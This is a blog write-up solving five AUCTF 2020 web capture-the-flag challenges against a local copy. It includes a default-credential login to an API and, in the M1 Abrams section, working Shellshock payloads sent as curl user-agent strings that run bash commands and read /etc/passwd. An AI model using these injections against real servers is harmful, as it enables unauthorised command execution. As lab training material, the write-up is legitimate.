AUCTF 2020 Web Writeups

Posted on 2020-04-07

https://ctftime.org/event/1020

Miyazaki Trivia50pt522/1184
Quick Maths50pt505/1184
gg no re50pt320/1184
API madness926pt85/1184
M1 Abrams977pt48/1184

The Dockerfile is kindly published, so let’s review it with it.
auehc/AUCTF-2020







Miyazaki Trivia

http://challenges.auctf.com:30020
Here’s a bit of trivia for you vidya game nerds.
Author: shinigami

The first problem is a puzzle. They want you to look for the file, but there are robots looking for the file all over the internet every day. Let’s take a look at robots.txt.

1
2
VIDEO GAME TRIVIA: What is the adage of Byrgenwerth scholars?
MAKE a GET request to this page with a header named 'answer' to submit your answer.

It was bloodborne. It’s familiar to me as a Japanese, but I can’t get my head around the word “adage”. I googled it and found “Fear the old blood”.

1
2
$ curl http://localhost/robots.txt -H "answer:Fear the old blood"
Master Willem was right.auctf{f3ar_z_olD3_8l0oD}

Good.







Quick Maths

http://challenges.auctf.com:30021
two plus two is four minus three that’s one quick maths
Author: shinigami

We played a little trick.

image.png

The eval function and PHP are used.
Let’s enter $flag.

image.png

Capture the flag.

In the writer’s writeup, use the method of getting all the variables out. I see. This is an educational problem.







gg no re

http://challenges.auctf.com:30022
A junior dev built this site but we want you to test it before we send it to production.
Author: shinigami

When I looked at the source code, I found authentication.js.

image.png

Oh…

1
var _0x44ff = ['TWFrZSBhIEdFVCByZXF1ZXN0IHRvIC9oaWRkZW4vbmV4dHN0ZXAucGhw', 'aW5jbHVkZXM=', 'bGVuZ3Ro', 'bG9n'];

It appears to be base64 encoded. Call Cyberchef.

image.png

BINGO. But nothing.

1
2
3
4
5
6
7
8
9
10
$ curl -i http:/localhost/hidden/nextstep.php
HTTP/1.1 200 OK
Date: Tue, 07 Apr 2020 02:08:48 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.0.33
ROT13: Znxr n CBFG erdhrfg gb /ncv/svany.cuc
Content-Length: 15
Content-Type: text/html; charset=UTF-8

Howdy neighbor!

ROT13. Cyberchef hasn’t left yet.

image.png

Go on to the next page.
Send a request with the flag variable set
OK.

1
2
$ curl http://localhost/api/final.php -X POST -d "flag"
auctf{1_w@s_laZ_w1t_dis_0N3}







API madness

http://challenges.auctf.com:30023
We are building out our new API. We even have authentication built in!
Author: shinigami

image.png

OK. Let’s check /static/help.

1
2
3
4
5
6
7
8
9
Endpoints
/api/login - POST
/api/ftp/dir - POST
/api/ftp/get_file - POST

Params
/api/login - username, password
/ftp/dir - dir
/ftp/get_file - file

If you find an API you don’t understand, you should try to throw it in various formats.
It seems to accept JSON format, but it takes a long time to reply, and the reply comes back as an error.
curl http://localhost/api/login -X POST -d '{"username":"user", "password":"pass"}' -H 'Content-type: application/json'

If you look at the response, there is an API that is not mentioned in the help. It is an API that is not included in the help. The hidden APIs are likely to have secrets there. Access it the way it’s written.

1
2
3
4
$ curl http://localhost/api/login_check -X POST -d '{"username":"user", "password":"pass"}' -H 'Content-type: application/json'
{
"token": null
}

Hmmm, seems to be an authentication error. I’m going to try some common authentication patterns.

1
2
3
4
$ curl http://localhost/api/login_check -X POST -d '{"username":"username", "password":"password"}' -H 'Content-type: application/json'
{
"token": "bc842c31a9e54efe320d30d948be61291f3ceee4766e36ab25fa65243cd76e0e"
}

Nice. Now that we have the token, we can try using this with other APIs and get the flag.txt.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$ curl http://localhost/api/ftp/dir -X POST -d '{"dir":".", "token":"bc842c31a9e54efe320d30d948be61291f3ceee4766e36ab25fa65243cd76e0e"}' -H 'Content-type: application/json'     
{
"dir": [
".dockerenv",
"bin",
"boot",
"dev",
"etc",
"flag.txt",
"ftp_server.py",
"home",
"lib",
"lib64",
"media",
"mnt",
"opt",
"proc",
"root",
"run",
"sbin",
"srv",
"startup.sh",
"sys",
"templates",
"tmp",
"usr",
"var",
"web_server.py"
],
"status": "OK"
}
$ curl http://localhost/api/ftp/get_file -X POST -d '{"file":"flag.txt", "token":"bc842c31a9e54efe320d30d948be61291f3ceee4766e36ab25fa65243cd76e0e"}' -H 'Content-type: application/json'
{
"file_data": "YXVjdGZ7MHdAc3BfNnJvSzNOX0B1dGh9Cg==\n",
"status": "OK"
}

The rest is up to the chef.







M1 Abrams

http://challenges.auctf.com:30024
We built up this server, and our security team seems pretty mad about it. See if you can find out why.
Author: shinigami

No clue, so I’ll try to use gobuster.
There is a cgi-bin folder.
Let’s use gobuster more.

1
2
3
4
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/scriptlet (Status: 200)

The scriptlet has 200 responses. Let’s take a look at this.

1
2
3
4
5
6
7
8
$ curl -i http://localhost/cgi-bin/scriptlet
HTTP/1.1 200 OK
Date: Wed, 08 Apr 2020 13:30:53 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 55
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)

What? Google it.
This is the result of the execution of the id command.
Since it seems to be running commands, let’s try shellshock.

1
2
3
4
5
$ curl http://localhost/cgi-bin/scriptlet -A "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Yes.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ curl http://localhost/cgi-bin/scriptlet -A "() { :; }; echo; echo; /bin/bash -c 'ls'"
scriptlet
$ curl http://localhost/cgi-bin/scriptlet -A "() { :; }; echo; echo; /bin/bash -c 'ls /'"
bin
boot
dev
etc
flag.file
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

flag.file !

1
2
3
4
5
6
7
$ curl http://localhost/cgi-bin/scriptlet -A "() { :; }; echo; echo; /bin/bash -c 'cat /flag.file'" > out
$ file out
out: ASCII text
$ cat out

1f8b0808de36755e0003666c61672e747874004b2c4d2e49ab56c9303634
8c0fce30f08ecf358eaf72484989ace502005a5da5461b000000

If you give it to cyberchef, it will give you a flag.